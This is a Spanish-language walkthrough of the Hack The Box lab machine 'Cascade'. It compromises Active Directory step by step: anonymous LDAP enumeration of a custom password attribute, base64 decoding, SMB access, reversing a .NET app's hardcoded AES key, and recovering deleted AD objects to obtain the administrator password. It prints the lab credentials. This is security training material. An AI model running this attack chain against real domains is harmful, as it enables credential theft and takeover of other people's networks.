write-ups / hackthebox / cascade-htb

HackTheBoxmediumWindows

Cascade — LDAP Enum y abuso de Active Directory

Enumeración LDAP de Active Directory en Cascade de HTB. Extracción de credenciales de atributos LDAP, reversing de .NET para descifrar contraseñas y acceso a la papelera de reciclaje de AD.

19 de julio de 20241 min read
HTBActive DirectoryLDAPTightVNC.NET Reversing

Reconocimiento

bash
nmap -sV -sC -oN cascade.nmap 10.10.10.182
Domain Controller
bash
cascade.local
. Puertos abiertos: 53, 88, 135, 389, 445, 636, 3268, 5985.

Enumeración LDAP

bash
ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" "(objectClass=user)" sAMAccountName cascadeLegacyPwd
El usuario
bash
r.thompson
tiene un atributo personalizado
bash
cascadeLegacyPwd
con una contraseña en Base64.
bash
echo "clk0bjVldmE=" | base64 -d
Password:
bash
rY4n5eva

Acceso SMB

bash
smbclient -U 'r.thompson%rY4n5eva' //10.10.10.182/Data
En el share encontramos un registro de VNC con contraseña cifrada y un archivo de configuración de una aplicación .NET llamada
bash
CascAudit
.

Reversing .NET

Decompilamos
bash
CascAudit.exe
con dnSpy. La aplicación usa AES-CBC con IV y key hardcodeados para descifrar las contraseñas de la base de datos SQLite
bash
Audit.db
.
Credenciales obtenidas:
bash
ArkSvc:w3lc0meFr31662

Papelera de reciclaje de Active Directory

El usuario
bash
ArkSvc
es miembro del grupo
bash
AD Recycle Bin
. Podemos recuperar objetos eliminados del Active Directory:
powershell
Get-ADObject -Filter {isDeleted -eq $true} -IncludeDeletedObjects -Properties *
Encontramos el objeto eliminado
bash
TempAdmin
con su contraseña en
bash
cascadeLegacyPwd
.
bash
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
Password del Administrator:
bash
baCT3r1aN00dles